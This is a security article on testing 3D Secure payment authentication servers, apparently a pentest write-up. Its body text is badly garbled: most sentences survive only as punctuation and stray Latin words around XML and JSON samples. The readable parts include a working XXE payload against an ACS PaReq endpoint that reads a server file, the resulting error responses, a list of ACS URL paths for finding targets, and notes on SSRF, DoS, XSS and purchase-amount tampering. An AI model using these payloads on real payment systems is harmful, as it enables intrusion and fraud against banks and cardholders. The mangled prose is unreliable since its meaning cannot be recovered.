El comercio electrónico es una de las áreas más grandes y de más rápido crecimiento y, por lo tanto, atrae la atención tanto de los investigadores de seguridad de la información como de los ciberdelincuentes. Por lo tanto, me gustaría comprender algunos aspectos de los mecanismos de seguridad utilizados en los pagos en línea.
, - — 3D Secure. , XML , (card not present payment). VISA , (Master Card, JCB International, AmEx, ), VISA EMV. EMV 3DS.
3D Secure ?
— Three Domain Secure.
— — , .
— — , .
— (interoperability domain) — , (, , ) 3D Secure. , (merchant plug-in), (access control server) .
?
3D Secure .
« ». , -. (), .. 3D Secure .
: - .
3DS, .
3D Secure
v1.0 - 2001 -…
v2.0 - 2014 -
v2.1 - 2017
v2.2 - 2018 1.0.2 CNP-, OTP-.
1.0.2 2001 .
v2.2, EMV , 2020- .
?
, 3DS.
, , .
?
, , — , ( ) -, 3DS. -.
1 — "". MPI-, .
(MPI) , , CRReq- (Card Range Request). , - CRR . .
MPI VeReq (Verification Request). - , 3DS .
VeRes (Verification Response) .
.
2 — MPI PaReq (Payment Request) — . .
PaReq OTP-.
3 — OTP- . - MPI PaRes (Payment Response), .
?
CRReq/CRRes . VeReq/VeRes .
<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
<Message id="999">
<VEReq>
<version>1.0.2</version>
<pan>4444333322221111</pan>
<Merchant>
<acqBIN>411111</acqBIN>
<merID>99000001</merID>
<password>99000001</password>
</Merchant>
<Browser>
<deviceCategory>0</deviceCategory>
<accept>*/*</accept>
<userAgent>curl/7.27.0</userAgent>
</Browser>
</VEReq>
</Message>
</ThreeDSecure>VeReq , PAN .
<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
<Message id="999">
<VERes>
<version>1.0.2</version>
<CH>
<enrolled>Y</enrolled>
<acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
</CH>
<url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
<protocol>ThreeDSecure</protocol>
</VERes>
</Message>
</ThreeDSecure>VeRes message id, , . status enrolled , .
URL-. , ACS PaReq.
Pareq
, , , . , , . , . PaReq.
URL: https://site.ru/acs/pareq
MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%shop.ru%2Fgates%2F3ds , PaReq ( POST), :
1) MD — . MPI, PaReq PaRes ;
2) PaReq — . ;
3) TermUrl — URL-, 3D Secure.
TermURL MD . ACS, reflected XSS. .
№1: ACS PaReq!
PaReq?
, PaReq. , PaReq — Xml-> zlib-> base64-> urlencode. burp.
, PaReq, xml. (purchAmount, amount currency), MessageId ( VeReq).
PaReq ( — PaReq, ), PaRes — , :
, -, XML- — XXE. !
, , PaReq. ! :
<ThreeDSecure><Message id="poEpShmja0A36YWe0JOyr4Zt"><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>
<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>
<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>
<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>ACS. XXE.
XXE
:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id=“123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>∾</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>acqBIN, merID, xid, date, purchAmount currency PaRes. ACS, , merID. .
( ) — URL. , . XXE.
. ACS , , PaRes error merID. , PaReq , :
<ThreeDSecure><Message id=" 123-123-123-123-123-123 "><PARes id=" 123-123-123-123-123-123 "><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>URL DNS HTTP- . — DOS XXE- "billion laughs" ( ).
?
URL-:
/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do:
acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card, .
- , proxy interceptor .
3D Secure v 2. *
, 3DS v1.0 .
, . , , , .. ACS .
3DS 2.0 3DS SDK.
, . . , , , .
, . , 3DS OTP. v2 .
v1.0. , , !
.
3D Secure v2?
. .
— Risk Engine. 1.0.2 , OTP. 2. * .
v2
, , , 2- . Risck Engine, ( ), ( 3DS SDK).
, 2- . , , , .
?
AReq (base64url) , .
, , AReq . , , : . , )
.
, Risk Engine , OTP-.
?
CReq (base64url json) — challenge request — , , ARes Challenge Flow.
{
"ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
"AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
"MessageType": "CReq",
"MessageVersion": "2.1.0",
"SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
"SdkCounterStoA": "001"
}
3D Secure SDK, (JWE).
CReq :
, 2- 3DS, , . , .
( )
v1
- XXE Pareq:
- DOS
- ssrf
- XSS TermUrl
- Blind XSS —
- Pareq , ! , .. , 100 1.
v2
- Blind XSS —
- Challenge flow, …
, , , 3DS SaaS. , , -.
https://github.com/w3c/webpayments/wiki
https://www.EMV.com/emv-technologies/3d-secure/
https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html
https://github.com/webr0ck/3D-Secure-audit-cheatsheet
P.S. , : " AliExpress, Amazon, , OTP . 3DS?" , . , .